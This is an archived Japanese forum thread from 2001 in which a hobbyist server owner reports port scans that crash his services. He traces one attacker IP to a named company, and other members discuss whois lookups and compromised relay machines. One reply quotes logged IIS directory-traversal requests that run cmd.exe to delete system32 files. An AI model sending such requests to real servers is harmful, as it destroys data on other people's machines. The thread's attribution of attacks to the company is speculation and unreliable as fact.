どるこむ仲間の掲示板! 過去ログ倉庫 LOG:2001/12:
●2001年12月インデックス ●過去ログ検索トップ ■どるこむ仲間の掲示板へ
[4728] 翼に鯖を落とされた・・・ (14 レス)
2001/12/07(Fri) 01:09:02
伝説のペペロンチーノEpion【Selena】 さん
Web: http://www.pluto.dti.ne.jp/~epion/swe/
最近うちの鯖のアクセスログを眺めてるとやけに多いのが不正な手段によるアクセス痕跡.
と言っても中にはいられたとか言うのではなく,どうも特定のポートを狙って攻撃を仕掛けて失敗しているorポートスキャン風に無作為に穴を探してる感じのものです.
何が変って,わざわざhttp://www.tk-works.homeip.net:●●●●と言う風に,ポート指定(しかも普通は使わないような範囲のポートに置いたサービスだったりする)で該当サービスとは関係ないプロトコルでアクセスをかけてきたりしてるところがどうも狙ってる臭い.
これがあると,元々httpでアクセスされることを考慮しないシステムで提供しているサービスのソフトが落ちる事もあるので非常にうざい・・・(--;

今日も外からつながらなくなったので怪しいと思いつつ帰宅するとやはりエラーはいて落ちてました.>提供サービス@チャットとBBS
限定的なIPのアクセスは次から不可にするためにアクセスログをすぐ確認した所,やはりありました怪しい足跡.
さっそくIPアドレスをさかのぼると出てきたのは『翼システム株式会社』・・・(汗)

この会社,どこかで聞いた事があるような・・・と薄れかかった記憶をたどるに,以前『任意vs春奈』の関係の時にちらちらと見え隠れしていたあの会社と重なってしまうのですが,同一なのでしょうか?
それとも『他人の空似』で無関係?

いずれにしても不正なアクセス元である事には変わり無いので資料代わりにIPを公表しておくと『202.230.52.129』.
そう言えば最近『西日本メディカル』なんてとこからもちょくちょくあるんだよなぁ・・・

1. 聖者98狂 2001/12/07(Fri) 01:14:08
あるソフトを使ってみると「ドメイン名を調査できませんでした」と出ますねえ。
まあ、まだ鯖を立てる技術も無いのであれですが・・・。

私は普段ここのサービスを利用してます.
『IPドメインSEARCH』
http://www.mse.co.jp/ip_domain/

3. 聖者98狂 2001/12/07(Fri) 01:19:16
さんくすです。
うーん、東大阪ですか。いい仕事をしてますね〜ぇ。
今後の参考にします。

4. 京見峠#27 2001/12/07(Fri) 01:29:39
Epionさんとこに、アタックをかけてきてるマシンは、被害者で
あると同時に、加害者であるということかなぁ?その場合でも、
管理不行き届きは、確かですね(--;

#主語追加(1:30)

telnetで開設している某波動BBSはともかく,チャット鯖にいたっては公に公開しないで内輪で楽しんでるものなのでピンポイントでポートを特定してwww.tk-works.homeip.net:●●●●なんてアクセスをされることは考えにくいんですよね・・・
数字的にもかなり大きな桁になるし,やはりスキャンついでに落とされてるんでしょうか.
だとしてもこう頻繁に落とされるようではほとんど営業妨害状態です・・・

そう言えば相手の鯖のポートをなめて非公開ftpを探す,なんて迷惑なオンラインソフトを公開している所があったなぁ・・・それ系だろうか.

6. ペンチアム 2001/12/07(Fri) 02:16:27
翼システムだと狙ってるポートが9801だったりしませんか(ぉぃ

8. 蒼流 2001/12/07(Fri) 04:23:51
>あの会社と重なってしまうのですが,同一なのでしょうか?
こことかで調べると住所が分かります。
http://www.uwhois.com/cgi/whois.cgi

そしてwww.pers○naware.gr.jp も調べると…

9. JunkTime 2001/12/07(Fri) 07:10:45
>数字的にもかなり大きな桁になるし,やはりスキャンついでに落とされてるんでしょうか.
 最近のlinuxには、ポートスキャンツールであるnmapが標準装備されたりしています。そのくらいのことなら、やろうと思えば特別なツールを作らなくても誰でもできるでしょう。
 攻撃元ですが、単に踏み台にされているだけの可能性もあります。どちらにしても、まず、そのサイトの管理者にログ同封のmailで文句を言うのが筋でしょう。当然なさってはいるでしょうけれど・・・、老婆心です。
 話は違うけれど、最近、中国や韓国からの明らかに破壊を狙ったアタックが多いです。ログから抜粋すると、以下のようなものです。
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\WINNT\SYSTEM32\*.* HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\WINNT\SYSTEM32\*.* HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+del+c:\WINNT\SYSTEM32\*.* HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+del+c:\WINNT\SYSTEM32\*.exe HTTP/1.0
 明らかに、セキュリティパッチを当てていないIISのサイトを破壊する目的のようです。ひどい時代になったものです。

10. 聖者98狂 2001/12/07(Fri) 10:03:57
便利になるのはいいが物騒にもなる。
新技術は悪用される落ちなのか?

よくあるたとえ話に『カッターナイフやハサミなどは日用品であると同時に人も殺すことが出来る』なんてのがありますね.
結局は使う人間の心ひとつなんでしょうね・・・

#諸行無常の・・・地引網(なんで

13. 聖者98狂 2001/12/07(Fri) 11:49:58
結局は同じ網(wwwワールドワイドウェブ)のムジナ・・・ですか?

14. 風 早彦 2001/12/07(Fri) 21:09:44
>カッターナイフやはさみなど
他人を傷つける恐れのあるもの全般にいえることですね
使う人の心ひとつでなんだって白にも黒にもなるものです


▲ページの先頭へ